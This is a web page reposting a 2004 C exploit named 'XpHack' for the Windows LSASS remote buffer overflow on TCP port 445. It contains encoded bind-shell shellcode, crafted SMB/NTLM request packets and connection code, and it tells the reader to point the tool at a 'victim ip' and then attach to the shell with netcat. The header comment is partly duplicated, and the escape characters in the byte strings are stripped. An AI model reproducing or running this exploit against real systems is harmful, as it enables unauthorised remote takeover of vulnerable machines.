Microsoft Windows LSASS Buffer Overrun

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 315

/*
--------XpHack 1.0 Beta--------

CODED BY: JOCANOR

This is a first exploit of a project called ASQ12.
ASQ12 is a collection of exploits codeds f /*
--------XpHack 1.0 Beta--------

CODED BY: JOCANOR

This is a first exploit of a project called ASQ12.
ASQ12 is a collection of exploits codeds for me, the
expoloits of the collection are simple to use by anybody.

Some exploits of my project ASQ12 are still private,

***and some are based on anothers exploits*****

Use at your own risk, this code if only for educational purposes,
the autor is not reponsable.

This is a Exploit coded for hack all windows xp by the bug:

Lsass in port 445 tcp/ip, remote buffer overflow.

You can get a shell Easy with this code, example:

C:> xphack 198.0.0.1 4444

later open a new cmd and type:

C:> nc 192.0.0.1 4444

Happy Hacking!!!!!!!!!!!!

JOCANOR (c) 2004

*/
#include <windows.h>

#pragma comment(lib, "ws2_32")

unsigned char bindshell[] =
"xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";

char req1[] =
"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
"x20x4Cx4Dx20x30x2Ex31x32x00";

char req2[] =
"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
"x2Ex00x30x00x00x00x00x00";

char req3[] =
"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
"x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF"
"x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00"
"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";

char req4[] =
"x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00"
"x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00"
"x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00"
"x49x00x50x00x43x00x24"
"x00x00x00x3Fx3Fx3Fx3Fx3Fx00";

char req5[] =
"x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00"
"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00"
"x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00"
"x72x00x70x00x63x00x00x00";

char req6[] =
"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11"
"x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A"
"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";

char req7[] =
"x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02"
"x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00"
"xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00"
"xECx03x00x00x00x00x00x00xECx03x00x00";

char shit1[] =

"x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";

char shit3[] =
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";

#define LEN 3500
#define NOP 0x90
#define BUFSIZE 2000

int main(int argc, char *argv[])
{

int i;
char hostipc[40];
char *target;
char hostipc2[40*2];
unsigned short port;
unsigned long ip;
unsigned char *sc;
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char recvbuf[1600];
char strasm[]="x66x81xECx1Cx07xFFxE4";
char strBuffer[BUFSIZE];
int len, sockfd;
short dport = 445;
struct hostent *he;
struct sockaddr_in their_addr;
char smblen;
char unclen;
WSADATA wsa;

printf(" -----XpHack 1.0 beta----- ");
printf("-----ExPlOiT CoDeD By: JoCaNoR----- ");

if (argc < 2)
{
printf("Usage: ");
printf("xphack <victim ip> <binshell port> ");
exit(0);
}

target = argv[1];
sprintf((char *)hostipc,"\\%s\ipc$", target);

for (i=0; i<40; i++)
{
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}

memcpy(req4u, req4, sizeof(req4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);

smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);

unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);

port = htons(atoi(argv[2]))^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;

memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, sc, strlen(sc));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=0x01004600;

memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);

WSAStartup(MAKEWORD(2,0),&wsa);

if ((he=gethostbyname(argv[1])) == NULL)
{
perror("Unable to resolve");
exit(1);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket error");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '', 8);

printf("Connecting...");
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf(" Error, cna't connect to victim machine");
exit(1);
}

printf("Good ");

if (send(sockfd, req1, sizeof(req1)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

if (send(sockfd, req2, sizeof(req2)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

if (send(sockfd, req3, sizeof(req3)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

printf("Getting a shell...");
if (send(sockfd, req4u, smblen+4, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

if (send(sockfd, req5, sizeof(req5)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

if (send(sockfd, req6, sizeof(req6)-1, 0) == -1)
{
printf("Error ");
exit(1);
}
len = recv(sockfd, recvbuf, 1600, 0);

memcpy(screq, req7, sizeof(req7)-1);
memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16);

screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0;
if (send(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1)
{
printf("Error ");
exit(1);
}

printf("OoOoOps shell!! ");

len = recv(sockfd, recvbuf, 1600, 0);

return 0;
}

/* CODED BY JOCANOR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*/